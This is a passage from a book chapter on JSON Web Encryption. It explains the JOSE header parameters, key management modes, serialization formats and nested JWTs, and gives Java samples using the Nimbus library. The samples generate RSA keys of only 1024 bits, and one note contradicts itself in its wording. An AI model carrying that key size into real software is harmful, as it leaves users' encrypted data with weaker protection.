If the value of the alg parameter is not picked from the preceding registry, then it should be defined in a collision-resistant manner, but that won’t give any guarantee that the particular algorithm is identified by all JWE implementations. It’s always better to stick to the algorithms defined in the JWA specification. • enc: The enc parameter in the JOSE header represents the name of the algorithm, which is used for content encryption. This algorithm should be a symmetric Authenticated Encryption with Associated 2 JWS algorithms are defined and explained in the JSON Web Algorithms (JWA) specification, https://tools.ietf.org/html/rfc7518. Figure 8-1. A JWE token with compact serialization Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 187 Data (AEAD) algorithm. This is a required attribute in the JOSE header. Failure to include this in the header will result in a token parsing error. The value of the enc parameter is a string, which is picked from the JSON Web Signature and Encryption Algorithms registry defined by the JSON Web Algorithms (JWA) specification. If the value of the enc parameter is not picked from the preceding registry, then it should be defined in a collision-resistant manner, but that won’t give any guarantee that the particular algorithm is identified by all JWE implementations. It’s always better to stick to the algorithms defined in the JWA specification. • zip: The zip parameter in the JOSE header defines the name of the compression algorithm. The plaintext JSON payload gets compressed before the encryption, if the token issuer decides to use compression. The compression is not a must. The JWE specification defines DEF as the compression algorithm, but it’s not a must to use it. The token issuers can define their own compression algorithms. The default value of the compression algorithm is defined in the JSON Web Encryption Compression Algorithms registry under the JSON Web Algorithms (JWA) specification. This is an optional parameter. • jku: The jku parameter in the JOSE header carries a URL, which points to a JSON Web Key (JWK)3 set. This JWK set represents a collection of JSON-encoded public keys, where one of the keys is used to encrypt the Content Encryption Key (CEK). Whatever the protocol used to retrieve the key set should provide the integrity protection. If keys are retrieved over HTTP, then instead of plain HTTP, HTTPS (or HTTP over TLS) should be used. We discuss Transport Layer Security (TLS) in detail in Appendix C. The jku is an optional parameter. • jwk: The jwk parameter in JOSE header represents the public key corresponding to the key that is used to encrypt the Content Encryption Key (CEK). The key is encoded as per the JSON Web Key (JWK) specification.3 The jku parameter, which we discussed before, 3 A JSON Web Key (JWK) is a JSON data structure that represents a cryptographic key, https://tools.ietf.org/html/rfc7517 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 188 points to a link that holds a set of JWKs, while the jwk parameter embeds the key into the JOSE header itself. The jwk is an optional parameter. • kid: The kid parameter of the JOSE header represents an identifier for the key that is used to encrypt the Content Encryption Key (CEK). Using this identifier, the recipient of the JWE should be able to locate the key. 
If the token issuer uses the kid parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWE specification. If the value of the kid parameter refers to a JWK, then the value of this parameter should match the value of the kid parameter in the JWK. The kid is an optional parameter in the JOSE header. • x5u: The x5u parameter in the JOSE header is very much similar to the jku parameter, which we discussed before. Instead of pointing to a JWK set, the URL here points to an X.509 certificate or a chain of X.509 certificates. The resource pointed by the URL must hold the certificate or the chain of certificates in the PEM-encoded form. Each certificate in the chain must appear between the delimiters4: -----BEGIN CERTIFICATE----- and -----END CERTIFICATE-----. The public key corresponding to the key used to encrypt the Content Encryption Key (CEK) should be the very first entry in the certificate chain, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5u is an optional parameter in the JOSE header. • x5c: The x5c parameter in the JOSE header represents the X.509 certificate (or the certificate chain), which corresponds to the public key, which is used to encrypt the Content Encryption Key (CEK). This is similar to the jwk parameter we discussed before, but in this case instead of a JWK, it’s an X.509 certificate (or a chain of certificates). The certificate or the certificate chain is represented in a JSON 4 The Internet IP Security PKI Profile of IKEv1/ISAKMP, IKEv2, and PKIX (RFC 4945) defines the delimiters for X.509 certificates under Section 6.1, https://tools.ietf.org/html/rfc4945 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 189 array of certificate value strings. Each element in the array should be a base64-encoded DER PKIX certificate value. The public key corresponding to the key used to encrypt the Content Encryption Key (CEK) should be the very first entry in the JSON array, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5c is an optional parameter in the JOSE header. • x5t: The x5t parameter in the JOSE header represents the base64url- encoded SHA-1 thumbprint of the X.509 certificate corresponding to the key used to encrypt the Content Encryption Key (CEK). This is similar to the kid parameter we discussed before. Both these parameters are used to locate the key. If the token issuer uses the x5t parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWE specification. The x5t is an optional parameter in the JOSE header. • x5t#s256: The x5t#s256 parameter in the JOSE header represents the base64url-encoded SHA256 thumbprint of the X.509 certificate corresponding to the key used to encrypt the Content Encryption Key (CEK). The only difference between x5t#s256 and the x5t is the hashing algorithm. The x5t#s256 is an optional parameter in the JOSE header. • typ: The typ parameter in the JOSE header is used to define the media type of the complete JWE. There are two types of components that process a JWE: JWE implementations and JWE applications. Nimbus5 is a JWE implementation in Java. 
The Nimbus library knows how to build and parse a JWE. A JWE application can be anything, which uses JWE internally. A JWE application uses a JWE implementation to build or parse a JWE. In this case, the typ parameter is just another parameter for the JWE implementation. It will not try to interpret the value of it, but the JWE application would. The typ parameter will help JWE applications to differentiate the 5 Nimbus JWT Java implementation, http://connect2id.com/products/nimbus-jose-jwt Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 190 content when multiple types of objects are present. For a JWS token using JWS compact serialization and for a JWE token using JWE compact serialization, the value of the typ parameter is JOSE, and for a JWS token using JWS JSON serialization and for a JWE token using JWE JSON serialization, the value is JOSE+JSON. (JWS serialization was discussed in Chapter 7 and JWE serialization is discussed later in this chapter). The typ is an optional parameter in the JOSE header. • cty: The cty parameter in the JOSE header is used to represent the media type of the secured content in the JWE. It is only recommended to use this parameter in the case of a nested JWT. The nested JWT is discussed later in this chapter, and the definition of the cty parameter is further explained there. The cty is an optional parameter in the JOSE header. • crit: The crit parameter in the JOSE header is used to indicate to the recipient of the JWE that the presence of custom parameters, which neither defined by the JWE or JWA specifications, in the JOSE header. If these custom parameters are not understood by the recipient, then the JWE token will be treated as invalid. The value of the crit parameter is a JSON array of names, where each entry represents a custom parameter. The crit is an optional parameter in the JOSE header. Out of all the 13 parameters defined earlier, 7 talk about how to reference the public key, which is used to encrypt the Content Encryption Key (CEK). There are three ways of referencing a key: external reference, embedded, and key identifier. The jku and x5u parameters fall under the external reference category. Both of them reference the key through a URI. The jwk and x5c parameters fall under embedded reference category. Each one of them defines how to embed the key to the JOSE header itself. The kid, x5t, and x5t#s256 parameters fall under the key identifier reference category. All three of them define how to locate the key using an identifier. Then again all the seven parameters can further divide into two categories based on the representation of the key: JSON Web Key (JWK) and X.509. The jku, jwk, and kid fall under the JWK category, while x5u, x5c, x5t, and x5t#s256 fall under the X.509 category. In the JOSE header of a given JWE token, at a given time, we only need to have one from the preceding parameters. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 191 Note the JsON payload, which is subject to encryption, could contain whitespaces and/or line breaks before or after any JsON value. The JWE specification does not restrict applications only to use 13 header parameters defined earlier. There are two ways to introduce new header parameters: public header names and private header names. Any header parameter that is intended to use in the public space should be introduced in a collision-resistant manner. 
It is recommended to register such public header parameters in the IANA JSON Web Signature and Encryption Header Parameters registry. The private header parameters are mostly used in a restricted environment, where both the token issuer and the recipients are well aware of each other. These parameters should be used with caution, because there is a chance for collision. If a given recipient accepts tokens from multiple token issuers, then the semantics of the same parameter may be different from one issuer to another, if it is a private header. In either case, whether it's a public or a private header parameter, if it is not defined in the JWE or the JWA specification, the header name should be included in the crit header parameter, which we discussed before.

JWE Encrypted Key
To understand the JWE Encrypted Key section of the JWE token, we first need to understand how a JSON payload gets encrypted. The enc parameter of the JOSE header defines the content encryption algorithm, and it should be a symmetric Authenticated Encryption with Associated Data (AEAD) algorithm. The alg parameter of the JOSE header defines the encryption algorithm used to encrypt the Content Encryption Key (CEK). We can also call this algorithm a key wrapping algorithm, as it wraps the CEK.

AUTHENTICATED ENCRYPTION
Encryption alone provides only data confidentiality: only the intended recipient can decrypt and view the encrypted data. Even though the data is not visible to everyone, anyone having access to the encrypted data can change its bit stream to reflect a different message. For example, if Alice transfers US $100 from her bank account to Bob's account and that message is encrypted, then Eve in the middle can't see what's inside it. But Eve can modify the bit stream of the encrypted data to change the message, say from US $100 to US $150. The bank which controls the transaction would not detect this change done by Eve in the middle and would treat it as a legitimate transaction. This is why encryption by itself is not always safe, and in the 1970s this was identified as an issue in the banking industry. Unlike plain encryption, authenticated encryption simultaneously provides confidentiality, integrity, and authenticity guarantees for data. ISO/IEC 19772:2009 has standardized six different authenticated encryption modes: GCM, OCB 2.0, CCM, Key Wrap, EAX, and Encrypt-then-MAC. Authenticated Encryption with Associated Data (AEAD) extends this model with the ability to preserve the integrity and authenticity of Additional Authenticated Data (AAD) that isn't encrypted. AAD is also known as Associated Data (AD). AEAD algorithms take two inputs, the plaintext to be encrypted and the Additional Authenticated Data (AAD), and produce two outputs: the ciphertext and the authentication tag. The AAD represents the data to be authenticated, but not encrypted. The authentication tag ensures the integrity of the ciphertext and the AAD.

Let's look at the following JOSE header. For content encryption, it uses the A256GCM algorithm, and for key wrapping, RSA-OAEP:

{"alg":"RSA-OAEP","enc":"A256GCM"}

A256GCM is defined in the JWA specification. It uses the Advanced Encryption Standard (AES) in Galois/Counter Mode (GCM) with a 256-bit key, and it's a symmetric key algorithm used for AEAD. Symmetric keys are mostly used for content encryption. Symmetric key encryption is much faster than asymmetric key encryption.
At the same time, asymmetric key encryption can't be used to encrypt large messages. RSA-OAEP, too, is defined in the JWA specification. During the encryption process, the token issuer generates a random key, which is 256 bits in size, and encrypts the message using that key following the AES GCM algorithm. Next, the key used to encrypt the message is encrypted using RSA-OAEP,6 which is an asymmetric encryption scheme. The RSA-OAEP encryption scheme uses the RSA algorithm with the Optimal Asymmetric Encryption Padding (OAEP) method. Finally, the encrypted symmetric key is placed in the JWE Encrypted Key section of the JWE.

6 RSA-OAEP is a public key encryption scheme, which uses the RSA algorithm with the Optimal Asymmetric Encryption Padding (OAEP) method.

KEY MANAGEMENT MODES
The key management mode defines the method used to derive or compute a value for the Content Encryption Key (CEK). The JWE specification employs five key management modes, as listed in the following, and the appropriate key management mode is decided based on the alg parameter, which is defined in the JOSE header:

1. Key encryption: With the key encryption mode, the value of the CEK is encrypted using an asymmetric encryption algorithm. For example, if the value of the alg parameter in the JOSE header is RSA-OAEP, then the corresponding key management algorithm is RSAES OAEP using the default parameters. This relationship between the alg parameter and the key management algorithm is defined in the JWA specification. The RSAES OAEP algorithm uses key encryption as the key management mode to derive the value of the CEK.

2. Key wrapping: With the key wrapping mode, the value of the CEK is encrypted using a symmetric key wrapping algorithm. For example, if the value of the alg parameter in the JOSE header is A128KW, then the corresponding key management algorithm is AES Key Wrap with the default initial value, which uses a 128-bit key. The AES Key Wrap algorithm uses key wrapping as the key management mode to derive the value of the CEK.

3. Direct key agreement: With the direct key agreement mode, the value of the CEK is decided based upon a key agreement algorithm. For example, if the value of the alg parameter in the JOSE header is ECDH-ES, then the corresponding key management algorithm is Elliptic Curve Diffie-Hellman Ephemeral Static key agreement using Concat KDF. This algorithm uses direct key agreement as the key management mode to derive the value of the CEK.

4. Key agreement with key wrapping: With the key agreement with key wrapping mode, the value of the CEK is decided based upon a key agreement algorithm, and it is then encrypted using a symmetric key wrapping algorithm. For example, if the value of the alg parameter in the JOSE header is ECDH-ES+A128KW, then the corresponding key management algorithm is ECDH-ES using Concat KDF with the CEK wrapped with A128KW. This algorithm uses key agreement with key wrapping as the key management mode to derive the value of the CEK.

5. Direct encryption: With the direct encryption mode, the value of the CEK is the same as the symmetric key value, which is already shared between the token issuer and the recipient. For example, if the value of the alg parameter in the JOSE header is dir, then direct encryption is used as the key management mode to derive the value of the CEK.
JWE Initialization Vector Some encryption algorithms, which are used for content encryption, require an initialization vector, during the encryption process. Initialization vector is a randomly generated number, which is used along with a secret key to encrypt data. This will add randomness to the encrypted data, which will prevent repetition even if the same data gets encrypted using the same secret key again and again. To decrypt the message at the token recipient end, it has to know the initialization vector, hence included in the JWE token, under the JWE Initialization Vector element. If the content encryption algorithm does not require an initialization vector, then the value of this element should be kept empty. JWE Ciphertext The fourth element of the JWE token is the base64url-encoded value of the JWE ciphertext. The JWE ciphertext is computed by encrypting the plaintext JSON payload using the CEK, the JWE Initialization Vector, and the Additional Authentication Data (AAD) value, with the encryption algorithm defined by the header parameter enc. The algorithm defined by the enc header parameter should be a symmetric Authenticated Encryption with Associated Data (AEAD) algorithm. The AEAD algorithm, which is used to encrypt the plaintext payload, also allows specifying Additional Authenticated Data (AAD). JWE Authentication Tag The base64url-encoded value of the JWE Authentication Tag is the final element of the JWE token. The value of the authentication tag is produced during the AEAD encryption process, along with the ciphertext. The authentication tag ensures the integrity of the ciphertext and the Additional Authenticated Data (AAD). Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 195 The Process of Encryption (Compact Serialization) We have discussed about all the ingredients that are required to build a JWE token under compact serialization. The following discusses the steps involved in building the JWE token. There are five elements in a JWE token; the first element is produced by step 6, the second element is produced by step 3, the third element is produced by step 4, the fourth element is produced by step 10, and the fifth element is produced by step 11. 1. Figure out the key management mode by the algorithm used to determine the Content Encryption Key (CEK) value. This algorithm is defined by the alg parameter in the JOSE header. There is only one alg parameter per JWE token. 2. Compute the CEK and calculate the JWE Encrypted Key based on the key management mode, picked in step 1. The CEK is later used to encrypt the JSON payload. There is only one JWE Encrypted Key element in the JWE token. 3. Compute the base64url-encoded value of the JWE Encrypted Key, which is produced by step 2. This is the second element of the JWE token. 4. Generate a random value for the JWE Initialization Vector. Irrespective of the serialization technique, the JWE token carries the value of the base64url-encoded value of the JWE Initialization Vector. This is the third element of the JWE token. 5. If token compression is needed, the JSON payload in plaintext must be compressed following the compression algorithm defined under the zip header parameter. 6. Construct the JSON representation of the JOSE header and find the base64url- encoded value of the JOSE header with UTF-8 encoding. This is the first element of the JWE token. 7. 
To encrypt the JSON payload, we need the CEK (which we already have), the JWE Initialization Vector (which we already have), and the Additional Authenticated Data (AAD). Compute ASCII value of the encoded JOSE header (step 6) and use it as the AAD. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 196 8. Encrypt the compressed JSON payload (from step 5) using the CEK, the JWE Initialization Vector, and the Additional Authenticated Data (AAD), following the content encryption algorithm defined by the enc header parameter. 9. The algorithm defined by the enc header parameter is an AEAD algorithm, and after the encryption process, it produces the ciphertext and the Authentication Tag. 10. Compute the base64url-encoded value of the ciphertext, which is produced by step 9. This is the fourth element of the JWE token. 11. Compute the base64url-encoded value of the Authentication Tag, which is produced by step 9. This is the fifth element of the JWE token. 12. Now we have all the elements to build the JWE token in the following manner. The line breaks are introduced only for clarity. BASE64URL-ENCODE(UTF8(JWE Protected Header)). BASE64URL-ENCODE(JWE Encrypted Key). BASE64URL-ENCODE(JWE Initialization Vector). BASE64URL-ENCODE(JWE Ciphertext). BASE64URL-ENCODE(JWE Authentication Tag) JWE JSON Serialization Unlike the JWE compact serialization, the JWE JSON serialization can produce encrypted data targeting at multiple recipients over the same JSON payload. The ultimate serialized form under JWE JSON serialization represents an encrypted JSON payload as a JSON object. This JSON object includes six top-level elements: protected, unprotected, recipients, iv, ciphertext, and tag. The following is an example of a JWE token, which is serialized with JWE JSON serialization: Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 197 { "protected":"eyJlbmMiOiJBMTI4Q0JDLUhTMjU2In0", "unprotected":{"jku":"https://server.example.com/keys.jwks"}, "recipients":[ { "header":{"alg":"RSA1_5","kid":"2011-04-29"}, "encrypted_key":"UGhIOguC7IuEvf_NPVaXsGMoLOmwvc1GyqlIK..." }, { "header":{"alg":"A128KW","kid":"7"}, "encrypted_key":"6KB707dM9YTIgHtLvtgWQ8mKwb..." } ], "iv":"AxY8DCtDaGlsbGljb3RoZQ", "ciphertext":"KDlTtXchhZTGufMYmOYGS4HffxPSUrfmqCHXaI9wOGY", "tag":"Mz-VPPyU4RlcuYv1IwIvzw" } JWE Protected Header The JWE Protected Header is a JSON object that includes the header parameters that have to be integrity protected by the AEAD algorithm. The parameters inside the JWE Protected Header are applicable to all the recipients of the JWE token. The protected parameter in the serialized JSON form represents the base64url-encoded value of the JWE Protected Header. There is only one protected element in a JWE token at the root level, and any header parameter that we discussed before under the JOSE header can also be used under the JWE Protected Header. JWE Shared Unprotected Header The JWE Shared Unprotected Header is a JSON object that includes the header parameters that are not integrity protected. The unprotected parameter in the serialized JSON form represents the JWE Shared Unprotected Header. There is only one unprotected element in a JWE token at the root level, and any header parameter that we discussed before under the JOSE header can also be used under the JWE Shared Unprotected Header. 
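As with JWS JSON serialization, the protected value is just the base64url-encoded form of a JSON header, while the unprotected value is plain JSON. The following minimal sketch (plain JDK, no JWE library needed; the class name is illustrative) decodes the protected value from the preceding JWE example and reveals the content encryption algorithm that applies to every recipient of the token:

import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class JweProtectedHeaderDecode {

    public static void main(String[] args) {
        // the protected value from the preceding JSON-serialized JWE example
        String protectedHeader = "eyJlbmMiOiJBMTI4Q0JDLUhTMjU2In0";

        // base64url-decode it to reveal the integrity-protected header,
        // which applies to all recipients of the JWE token
        byte[] decoded = Base64.getUrlDecoder().decode(protectedHeader);

        // prints {"enc":"A128CBC-HS256"} - the content encryption algorithm
        System.out.println(new String(decoded, StandardCharsets.UTF_8));
    }
}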
Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 198 JWE Per-Recipient Unprotected Header The JWE Per-Recipient Unprotected Header is a JSON object that includes the header parameters that are not integrity protected. The parameters inside the JWE Per-Recipient Unprotected Header are applicable only to a particular recipient of the JWE token. In the JWE token, these header parameters are grouped under the parameter recipients. The recipients parameter represents an array of recipients of the JWE token. Each member consists of a header parameter and an encryptedkey parameter. • header: The header parameter, which is inside the recipients parameter, represents the value of the JWE header elements that aren’t protected for integrity by authenticated encryption for each recipient. • encryptedkey: The encryptedkey parameter represents the base64url-encoded value of the encrypted key. This is the key used to encrypt the message payload. The key can be encrypted in different ways for each recipient. Any header parameter that we discussed before under the JOSE header can also be used under the JWE Per-Recipient Unprotected Header. JWE Initialization Vector This carries the same meaning as explained under JWE compact serialization previously in this chapter. The iv parameter in the JWE token represents the value of the initialization vector used for encryption. JWE Ciphertext This carries the same meaning as explained under JWE compact serialization previously in this chapter. The ciphertext parameter in the JWE token carries the base64url- encoded value of the JWE ciphertext. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 199 JWE Authentication Tag This carries the same meaning as explained under JWE compact serialization previously in this chapter. The tag parameter in the JWE token carries the base64url-encoded value of the JWE Authentication Tag, which is an outcome of the encryption process using an AEAD algorithm. The Process of Encryption (JSON Serialization) We have discussed about all the ingredients that are required to build a JWE token under JSON serialization. The following discusses the steps involved in building the JWE token. 1. Figure out the key management mode by the algorithm used to determine the Content Encryption Key (CEK) value. This algorithm is defined by the alg parameter in the JOSE header. Under JWE JSON serialization, the JOSE header is built by the union of all the parameters defined under the JWE Protected Header, JWE Shared Unprotected Header, and Per-Recipient Unprotected Header. Once included in the Per-Recipient Unprotected Header, the alg parameter can be defined per recipient. 2. Compute the CEK and calculate the JWE Encrypted Key based on the key management mode, picked in step 1. The CEK is later used to encrypt the JSON payload. 3. Compute the base64url-encoded value of the JWE Encrypted Key, which is produced by step 2. Once again, this is computed per recipient, and the resultant value is included in the Per-Recipient Unprotected Header parameter, encryptedkey. 4. Perform steps 1–3 for each recipient of the JWE token. Each iteration will produce an element in the recipients JSON array of the JWE token. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 200 5. Generate a random value for the JWE Initialization Vector. Irrespective of the serialization technique, the JWE token carries the value of the base64url-encoded value of the JWE Initialization Vector. 6. 
If token compression is needed, the JSON payload in plaintext must be compressed following the compression algorithm defined under the zip header parameter. The value of the zip header parameter can be defined either in the JWE Protected Header or the JWE Shared Unprotected Header.

7. Construct the JSON representation of the JWE Protected Header, JWE Shared Unprotected Header, and Per-Recipient Unprotected Headers.

8. Compute the base64url-encoded value of the UTF-8-encoded JWE Protected Header. This value is represented by the protected element in the serialized JWE token. The JWE Protected Header is optional, and if present there can be only one. If no JWE Protected Header is present, then the value of the protected element will be empty.

9. Generate a value for the Additional Authenticated Data (AAD) and compute the base64url-encoded value of it. This is an optional step, and if it is carried out, the base64url-encoded AAD value will be used as an input parameter to encrypt the JSON payload, as in step 10.

10. To encrypt the JSON payload, we need the CEK (which we already have), the JWE Initialization Vector (which we already have), and the Additional Authenticated Data (AAD). Compute the ASCII value of the encoded JWE Protected Header (from step 8) and use it as the AAD. If step 9 is carried out, the AAD is instead computed as ASCII(encoded JWE Protected Header . BASE64URL-ENCODE(AAD)), that is, the encoded JWE Protected Header and the base64url-encoded AAD value joined by a period (.).

11. Encrypt the compressed JSON payload (from step 6) using the CEK, the JWE Initialization Vector, and the Additional Authenticated Data (AAD from step 10), following the content encryption algorithm defined by the enc header parameter.

12. The algorithm defined by the enc header parameter is an AEAD algorithm, and after the encryption process, it produces the ciphertext and the Authentication Tag.

13. Compute the base64url-encoded value of the ciphertext, which is produced by step 12.

14. Compute the base64url-encoded value of the Authentication Tag, which is produced by step 12.

Now we have all the elements to build the JWE token under JSON serialization.

Note: The XML Encryption specification by W3C only talks about encrypting an XML payload. If you have to encrypt any other content, you first need to embed it within an XML payload and then encrypt that. In contrast, the JWE specification is not limited to JSON; you can encrypt any content with JWE without wrapping it inside a JSON payload.

Nested JWTs

Both in a JWS token and a JWE token, the payload can be of any content. It can be JSON, XML, or anything. In a Nested JWT, the payload must be a JWT itself. In other words, a JWT that is enclosed in another JWS or JWE token builds a Nested JWT. A Nested JWT is used to perform nested signing and encryption. In the case of a Nested JWT, the cty header parameter must be present and set to the value JWT. The following lists out the steps in building a Nested JWT, which signs a payload first using JWS and then encrypts the JWS token using JWE:

1. Build the JWS token with the payload or the content of your choice.

2. Based on the JWS serialization technique you use, step 1 will produce either a JSON object (with JSON serialization) or a three-element string where each element is separated by a period (.) (with compact serialization).

3. Base64url-encode the output from step 2 and use it as the payload to be encrypted for the JWE token.

4.
Set the value of the cty header parameter of the JWE JOSE header to JWT. 5. Build the JWE following any of the two serialization techniques defined in the JWE specification. Note sign first and then encrypt is the preferred approach in building a nested Jwt, instead of sign and then encrypt. the signature binds the ownership of the content to the signer or the token issuer. it is an industry accepted best practice to sign the original content, rather than the encrypted content. also, when sign first and encrypt the signed payload, the signature itself gets encrypted too, preventing an attacker in the middle stripping off the signature. since the signature and all its related metadata are encrypted, an attacker cannot derive any details about the token issuer looking at the message. when encrypt first and sign the encrypted payload, then the signature is visible to anyone and also an attacker can strip it off from the message. JWE VS. JWS From an application developer’s point of view, it may be quite important to identify whether a given message is a Jwe token or a Jws token and start processing based on that. the following lists out a few techniques that can be used to differentiate a Jws token from a Jwe token: 1. when compact serialization is used, a Jws token has three base64url-encoded elements separated by periods (.), while a Jwe token has five base64url- encoded elements separated by periods (.). 2. when JsON serialization is used, the elements of the JsON object produced are different in Jws token and Jwe token. For example, the Jws token has a top-level element called payload, which is not in the Jwe token, and the Jwe token has a top-level element called ciphertext, which is not in the Jws token. 3. the JOse header of a Jwe token has the enc header parameter, while it is not present in the JOse header of a Jws token. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 203 4. the value of the alg parameter in the JOse header of a Jws token carries a digital signature or a MaC algorithm or none, while the same parameter in the JOse header of a Jwe token carries a key encryption, key wrapping, direct key agreement, key agreement with key wrapping, or direct encryption algorithm. GENERATING A JWE TOKEN WITH RSA-OAEP AND AES WITH A JSON PAYLOAD the following Java code generates a Jwe token with rsa-Oaep and aes. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/ samples/tree/master/ch08/sample01—and it runs on Java 8+. First you need to invoke the method generateKeyPair() and pass the PublicKey(generateKeyPair(). getPublicKey()) into the method buildEncryptedJWT(): // this method generates a key pair and the corresponding public key is used // to encrypt the message. public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); // generate and return private/public key pair. return keyGenerator.genKeyPair(); } // this method is used to encrypt a JWT claims set using the provided public // key. public static String buildEncryptedJWT(PublicKey publicKey) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). 
// set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to this subject. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 204 subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 ∗ 60 ∗ 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT identifier. jwtID(UUID.randomUUID().toString()).build(); // create JWE header with RSA-OAEP and AES/GCM. JWEHeader jweHeader = new JWEHeader(JWEAlgorithm.RSA_OAEP, EncryptionMethod.A128GCM); // create encrypter with the RSA public key. JWEEncrypter encrypter = new RSAEncrypter((RSAPublicKey) publicKey); // create the encrypted JWT with the JWE header and the JWT payload. EncryptedJWT encryptedJWT = new EncryptedJWT(jweHeader, jwtClaims); // encrypt the JWT. encryptedJWT.encrypt(encrypter); // serialize into base64-encoded text. String jwtInText = encryptedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } the following Java code shows how to invoke the previous two methods: KeyPair keyPair = generateKeyPair(); buildEncryptedJWT(keyPair.getPublic()); to build and run the program, execute the following Maven command from the ch08/ sample01 directory. \> mvn test -psample01 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 205 Let’s see how to decrypt a Jwt encrypted by rsa-Oaep. you need to know the PrivateKey corresponding to the PublicKey used to encrypt the message: public static void decryptJWT() throws NoSuchAlgorithmException, JOSEException, ParseException { // generate private/public key pair. KeyPair keyPair = generateKeyPair(); // get the private key - used to decrypt the message. PrivateKey privateKey = keyPair.getPrivate(); // get the public key - used to encrypt the message. PublicKey publicKey = keyPair.getPublic(); // get encrypted JWT in base64-encoded text. String jwtInText = buildEncryptedJWT(publicKey); // create a decrypter. JWEDecrypter decrypter = new RSADecrypter((RSAPrivateKey) privateKey); // create the encrypted JWT with the base64-encoded text. EncryptedJWT encryptedJWT = EncryptedJWT.parse(jwtInText); // decrypt the JWT. encryptedJWT.decrypt(decrypter); // print the value of JOSE header. System.out.println("JWE Header:" + encryptedJWT.getHeader()); // JWE content encryption key. System.out.println("JWE Content Encryption Key: " + encryptedJWT. getEncryptedKey()); // initialization vector. System.out.println("Initialization Vector: " + encryptedJWT.getIV()); // ciphertext. System.out.println("Ciphertext : " + encryptedJWT.getCipherText()); // authentication tag. 
System.out.println("Authentication Tag: " + encryptedJWT.getAuthTag()); // print the value of JWT body System.out.println("Decrypted Payload: " + encryptedJWT.getPayload()); } the preceding code produces something similar to the following output: JWE Header: {"alg":"RSA-OAEP","enc":"A128GCM"} JWE Content Encryption Key: NbIuAjnNBwmwlbKiIpEzffU1duaQfxJpJaodkxDj SC2s3tO76ZdUZ6YfPrwSZ6DU8F51pbEw2f2MK_C7kLpgWUl8hMHP7g2_Eh3y Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 206 Th5iK6Agx72o8IPwpD4woY7CVvIB_iJqz-cngZgNAikHjHzOC6JF748MwtgSiiyrI 9BsmU Initialization Vector: JPPFsk6yimrkohJf Ciphertext: XF2kAcBrAX_4LSOGejsegoxEfb8kV58yFJSQ0_WOONP5wQ07HG mMLTyR713ufXwannitR6d2eTDMFe1xkTFfF9ZskYj5qJ36rOvhGGhNqNdGEpsB YK5wmPiRlk3tbUtd_DulQWEUKHqPc_VszWKFOlLQW5UgMeHndVi3JOZgiwN gy9bvzacWazK8lTpxSQVf-NrD_zu_qPYJRisvbKI8dudv7ayKoE4mnQW_fUY-U10 AMy-7Bg4WQE4j6dfxMlQGoPOo Authentication Tag: pZWfYyt2kO-VpHSW7btznA Decrypted Payload: { "exp":1402116034, "sub":"john", "nbf":1402115434, "aud":["https:\/\/app1.foo.com "," https:\/\/app2.foo.com"], "iss":"https:\/\/apress.com", "jti":"a1b41dd4-ba4a-4584-b06d-8988e8f995bf", "iat":1402115434 } GENERATING A JWE TOKEN WITH RSA-OAEP AND AES WITH A NON-JSON PAYLOAD the following Java code generates a Jwe token with rsa-Oaep and aes for a non- JsON payload. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/samples/tree/master/ch08/sample02— and it runs on Java 8+. First you need to invoke the method generateKeyPair() and pass the PublicKey(generateKeyPair().getPublicKey()) into the method buildEncryptedJWT(): // this method generates a key pair and the corresponding public key is used // to encrypt the message. public static KeyPair generateKeyPair() throws NoSuchAlgorithmException, JOSEException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 207 // generate and return private/public key pair. return keyGenerator.genKeyPair(); } // this method is used to encrypt a non-JSON payload using the provided // public key. public static String buildEncryptedJWT(PublicKey publicKey) throws JOSEException { // create JWE header with RSA-OAEP and AES/GCM. JWEHeader jweHeader = new JWEHeader(JWEAlgorithm.RSA_OAEP, EncryptionMethod.A128GCM); // create encrypter with the RSA public key. JWEEncrypter encrypter = new RSAEncrypter((RSAPublicKey) publicKey); // create a JWE object with a non-JSON payload JWEObject jweObject = new JWEObject(jweHeader, new Payload("Hello world!")); // encrypt the JWT. jweObject.encrypt(encrypter); // serialize into base64-encoded text. String jwtInText = jweObject.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } to build and run the program, execute the following Maven command from the ch08/ sample02 directory. \> mvn test -Psample02 GENERATING A NESTED JWT the following 